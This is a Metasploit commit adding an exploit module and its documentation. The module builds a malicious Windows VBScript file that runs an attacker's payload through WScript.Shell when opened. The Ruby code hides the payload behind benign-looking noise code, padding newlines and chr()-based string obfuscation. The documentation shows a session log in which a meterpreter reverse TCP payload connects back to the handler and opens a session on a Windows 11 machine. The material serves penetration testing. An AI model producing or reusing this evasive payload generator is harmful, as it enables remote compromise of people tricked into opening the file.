Land #20406, adds malicious Windows Script Host VBScript fileformat module

msutovsky-r7 · web-flow · commit f4622d802e23 · 2025-07-28T13:58:07.000+02:00
Add Malicious Windows Script Host VBScript (.vbs) File module
diff --git a/documentation/modules/exploit/windows/fileformat/windows_script_host_vbscript.md b/documentation/modules/exploit/windows/fileformat/windows_script_host_vbscript.md
@@ -0,0 +1,87 @@
+## Vulnerable Application
+
+This module creates a Windows Script Host (WSH) VBScript (.vbs) file.
+
+This module has been tested successfully on:
+
+* Microsoft Windows 7 Professional SP1 (x86_64)
+* Microsoft Windows 11 Professional 21H2 (x86_64)
+
+
+## Options
+
+### FILENAME
+
+The VBScript file name. (Default: `msf.vbs`).
+
+### OBFUSCATE
+
+Enable VBScript obfuscation. (Default: `true`)
+
+
+## Advanced Options
+
+### PrependBenignCode
+
+Prepend several lines of benign code at the start of the file. (Default: `true`)
+
+### PrependNewLines
+
+Prepend new lines before the malicious VBScript. (Default: `100`)
+
+
+## Verification Steps
+
+On the Metasploit host:
+
+1. Start msfconsole
+1. Do: `use exploit/windows/fileformat/windows_script_host_vbscript`
+1. Do: `set filename [filename.vbs]`
+1. Do: `set payload [payload]`
+1. Do: `set lhost [lhost]`
+1. Do: `set lport [lport]`
+1. Do: `run`
+1. Do: `handler -p [payload] -P [lport] -H [lhost]`
+
+On the target Windows machine:
+
+1. Ensure Windows Security is disabled
+1. Ensure Windows Registry `HKCU` and `HKLM` key `SOFTWARE\Microsoft\Windows Script Host\Settings\Enabled` is not present or set to 1
+1. Open the `msf.vbs` file
+1. If prompted to choose a program to open the file, select Windows Script Host
+
+
+## Scenarios
+
+### Microsoft Windows 11 Professional 21H2 (x86_64)
+
+```
+msf > use exploit/windows/fileformat/windows_script_host_vbscript
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/fileformat/windows_script_host_vbscript) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
+payload => cmd/windows/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/fileformat/windows_script_host_vbscript) > set lhost 192.168.200.130
+lhost => 192.168.200.130
+msf exploit(windows/fileformat/windows_script_host_vbscript) > set lport 4444
+lport => 4444
+msf exploit(windows/fileformat/windows_script_host_vbscript) > run
+[+] msf.vbs stored at /root/.msf4/local/msf.vbs
+msf exploit(windows/fileformat/windows_script_host_vbscript) > handler -p cmd/windows/http/x64/meterpreter/reverse_tcp -P 4444 -H 192.168.200.130
+[*] Payload handler running as background job 0.
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+msf exploit(windows/fileformat/windows_script_host_vbscript) > [*] Sending stage (203846 bytes) to 192.168.200.169
+[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.169:49977) at 2025-07-22 11:56:01 -0400
+
+msf exploit(windows/fileformat/windows_script_host_vbscript) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : WIN-11-PRO-X64
+OS              : Windows 11 21H2 (10.0 Build 22000).
+Architecture    : x64
+System Language : en_GB
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+```
diff --git a/modules/exploits/windows/fileformat/windows_script_host_vbscript.rb b/modules/exploits/windows/fileformat/windows_script_host_vbscript.rb
@@ -0,0 +1,220 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Malicious Windows Script Host VBScript (.vbs) File',
+        'Description' => %q{
+          This module creates a Windows Script Host (WSH) VBScript (.vbs) file.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'bcoles'
+        ],
+        'References' => [
+          ['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE],
+        ],
+        'Arch' => [ARCH_CMD],
+        'Platform' => 'win',
+        'Payload' => {
+          'Space' => 8_000, # 8190 maximum command length, minus some space for "cmd.exe /c " and escaping
+          'BadChars' => "\x00",
+          'DisableNops' => true
+        },
+        'Targets' => [
+          [
+            'Microsoft Windows 98 or newer', {}
+          ],
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '1998-06-25', # Windows 98 release date
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'DisablePayloadHandler' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [SCREEN_EFFECTS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('FILENAME', [true, 'The VBScript file name.', 'msf.vbs']),
+      OptBool.new('OBFUSCATE', [false, 'Enable VBScript obfuscation', true])
+    ])
+
+    register_advanced_options([
+      OptBool.new('PrependBenignCode', [false, 'Prepend several lines of benign code at the start of the file.', true]),
+      OptInt.new('PrependNewLines', [false, 'Prepend new lines before the malicious VBScript.', 100]),
+    ])
+  end
+
+  # Returns a random math expression evaluating to input int
+  #
+  # @param [Integer] int input integer
+  #
+  # @return [String] math expression evaluating to input int
+  def generate_number_expression(int)
+    case rand(4)
+    when 0 # Sum
+      a = rand(0..int)
+      b = int - a
+      "(#{a}+#{b})"
+    when 1 # Difference
+      r1 = int + rand(1..10)
+      r2 = r1 - int
+      "(#{r1}-#{r2})"
+    when 2 # Product (only if divisible)
+      divisors = (1..int).select { |d| (int % d).zero? }
+      if divisors.size > 1
+        d = divisors.sample
+        "(#{d}*#{int / d})"
+      else
+        "(#{int}+0)"
+      end
+    when 3 # Quotient
+      r2 = rand(1..10)
+      r1 = int * r2
+      "(#{r1}/#{r2})"
+    end
+  end
+
+  # Return VBScript code with all strings split into chunks and concatenated
+  #
+  # @param [String] vbscript VBScript code
+  #
+  # @return [String] VBScript code with chunked strings
+  def chunk_vbscript_strings(vbscript)
+    vbscript.gsub(/"([^"]+)"/) do
+      original = Regexp.last_match(1)
+      chunks = []
+
+      i = 0
+      while i < original.length
+        chunk_size = rand(1..5)
+        chunks << "\"#{original[i, chunk_size]}\""
+        i += chunk_size
+      end
+
+      chunks.join(' & ')
+    end
+  end
+
+  # Build a series of benign VBScript noise blocks
+  #
+  # @param [Integer] block_count Number of blocks to generate
+  #
+  # @return [String] block_count blocks of inert VBScript
+  def generate_vbscript_noise(block_count = 0)
+    lines = []
+
+    block_count.times do
+      case rand(4)
+      when 0 # Dummy variable declarations and assignments
+        v1 = rand_text_alpha(6..16)
+        v2 = rand_text_alpha(6..16)
+        a = rand(0..100)
+        b = rand(0..100)
+        lines << "Dim #{v1}, #{v2}"
+        lines << "#{v1} = #{a}"
+        lines << "#{v2} = #{b}"
+      when 1 # Dummy Function
+        fname = rand_text_alpha(6..16)
+        arg = rand_text_alpha(6..16)
+        mult = rand(1..5)
+        lines << "Function #{fname}(#{arg})"
+        lines << "    #{fname} = #{arg} * #{mult}"
+        lines << 'End Function'
+      when 2 # Dummy Sub
+        sname = rand_text_alpha(6..16)
+        arg = rand_text_alpha(6..16)
+        mult = rand(1..5)
+        lines << "Sub #{sname}(#{arg})"
+        lines << "    #{sname} = #{arg} * #{mult}"
+        lines << 'End Sub'
+      when 3 # Dummy For loop
+        idx = rand_text_alpha(6..16)
+        max = rand(1..5)
+        lines << "Dim #{idx}"
+        lines << "For #{idx} = 1 To #{max}"
+        lines << "    #{idx} = #{idx} + 0"
+        lines << 'Next'
+      end
+    end
+
+    lines.join("\r\n")
+  end
+
+  # Obfuscate string literals and integer literals
+  #
+  # @param [String] vbscript VBScript code to be obfuscated
+  #
+  # @return [String] Obfuscated VBScript
+  def obfuscate_vbscript(vbscript)
+    obfuscated = vbscript.dup
+
+    # Obfuscate strings
+    obfuscated = chunk_vbscript_strings(obfuscated)
+    obfuscated.gsub!(/"((?:[^"]|"")*)"/) do
+      raw = ::Regexp.last_match(1).gsub('""', '"')
+      raw.chars.map { |c| "chr(#{generate_number_expression(c.ord)})" }.join(' & ')
+    end
+
+    # Obfuscate integers
+    obfuscated.gsub!(/\b\d+\b/) do |num|
+      generate_number_expression(num.to_i)
+    end
+
+    obfuscated
+  end
+
+  def generate_vbscript(command_string, prepend_benign_code: false, prepend_new_lines: 0, obfuscate: false)
+    vbs = ''
+    vbs << generate_vbscript_noise(rand(8..10)) if prepend_benign_code
+    vbs << "\r\n" * prepend_new_lines
+
+    escaped_payload = command_string.gsub('\\', '\\\\\\').gsub('"', '\\"')
+
+    # If the payload contains " & " we presume it is a command string.
+    #
+    # TODO: Change this once Metasploit is able to inform a module that
+    #       the specified ARCH_CMD payload is a string of commands
+    #       (not a single command).
+    if escaped_payload.include?(' & ')
+      cmd = "cmd.exe /c #{escaped_payload}"
+    else
+      cmd = escaped_payload
+    end
+
+    shell_obj = 'WScript.Shell'.chars.map { |c| (rand(2) == 0 ? c.downcase : c.upcase) }.join
+    vbs_payload = "CreateObject(\"#{shell_obj}\").Run(\"#{cmd}\")"
+    if obfuscate
+      vbs << obfuscate_vbscript(vbs_payload)
+    else
+      vbs << vbs_payload
+    end
+
+    vbs
+  end
+
+  def exploit
+    vbs = generate_vbscript(
+      payload.encoded,
+      prepend_benign_code: datastore['PrependBenignCode'],
+      prepend_new_lines: datastore['PrependNewLines'],
+      obfuscate: datastore['OBFUSCATE']
+    )
+    file_create(vbs)
+  end
+end
